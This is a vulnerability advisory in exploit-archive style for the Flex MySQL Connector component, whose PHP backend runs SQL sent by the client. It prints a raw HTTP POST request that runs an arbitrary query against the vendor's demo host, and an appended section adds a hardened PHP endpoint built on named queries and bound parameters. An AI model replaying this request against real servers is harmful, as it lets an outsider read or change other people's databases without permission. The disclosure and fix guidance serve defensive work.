Flex MySQL Connector suffers from a remote SQL injection vulnerability.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$ Flex MySQL Connector Remote SQL Execution Exploit $$$
$$$
$$$ Flex MySQL Connector || License:  Commercial
$$$                      || Language: English
$$$                      || Cost:     $45.00
$$$                      || Platform: Flash Player 9 | Flash Player 10
$$$                      || Demo:     http://flexappsstore.com/flexapps/demo/mysql/
$$$
$$$ Credit               || Name:     ~Fyodor (aka DungPQ)
$$$                      || Email:    quangdung181188[at]gmail.com
$$$                      || Location: Hanoi, Vietnam
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
[$] Vulnz Description:
Flex MySQL Connector is a Flex component from FlexAppsStore which allows running SQL from ActionScript via a PHP backend (Flash <=> PHP <=> MySQL). The SQL statement itself travels in the request packet, so anybody can modify it and send it straight to the PHP backend, which means anybody can run arbitrary SQL commands against the victim's MySQL server => OMG!
[$] Exploitz:
Send an example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/
-----------------------------------------------------------------------------------
> Dest.IP = 66.147.242.177
> Dest.PORT = 80
---[Request BOF]---
POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10
Host: www.flexappsstore.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Content-Length: 89
Content-type: application/x-www-form-urlencoded
fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig
---[Request EOF]---
(Oh yeah, the SQL command is carried in the fas_sql field: SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig)
[$] PS: I don't give full PoC source code. You can make your PoC in PHP (using fsockopen(), cURL, ...) but if you want, contact me. ^_^
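The root cause is a design flaw: the client supplies the SQL text (fas_sql) and the backend executes it. The advisory does not include the vendor's PHP source; the following is an added illustration (not FlexAppsStore code) of the pattern described above, next to a hardened endpoint that only accepts the name of a server-side query and binds user input as parameters. The field name fas_query, the database credentials and the row_by_id query are assumptions; tbl_bigbig is taken from the request above.

```php
<?php
// Added example, not the vendor's code. The advisory describes a backend that
// executes whatever SQL arrives in the fas_sql POST field, i.e. roughly:
//
//   $db  = $_POST['fas_db'];
//   $sql = $_POST['fas_sql'];          // client-controlled SQL text
//   mysql_select_db($db); mysql_query($sql);   // vulnerable pattern, do not deploy
//
// Hardened form: the client may only name a query. The SQL lives on the
// server and user-supplied values are bound as parameters, never concatenated.

$pdo = new PDO('mysql:host=localhost;dbname=flexapps_demo', 'app_user', getenv('DB_PASS'), [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
]);

// Allowlist of named queries: the key comes from the client, the SQL does not.
// (Assumed names; only tbl_bigbig appears in the advisory.)
$queries = [
    'count_bigbig' => ['sql' => 'SELECT COUNT(*) AS cnt1 FROM tbl_bigbig',              'params' => []],
    'row_by_id'    => ['sql' => 'SELECT id, name FROM tbl_bigbig WHERE id = :id',       'params' => ['id']],
];

$name = $_POST['fas_query'] ?? '';
if (!isset($queries[$name])) {
    http_response_code(400);
    exit('unknown query');
}

$stmt = $pdo->prepare($queries[$name]['sql']);
foreach ($queries[$name]['params'] as $p) {
    if (!isset($_POST[$p])) {
        http_response_code(400);
        exit("missing parameter $p");
    }
    $stmt->bindValue(':' . $p, $_POST[$p]);   // bound value, cannot change the statement
}
$stmt->execute();

header('Content-Type: application/json');
echo json_encode($stmt->fetchAll(PDO::FETCH_ASSOC));
```

The MySQL account used by the endpoint should additionally be limited to the tables and privileges those named queries need, so that a future bug in the PHP layer cannot escalate to the whole server.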
[$] ~Fyodor - The Still Lake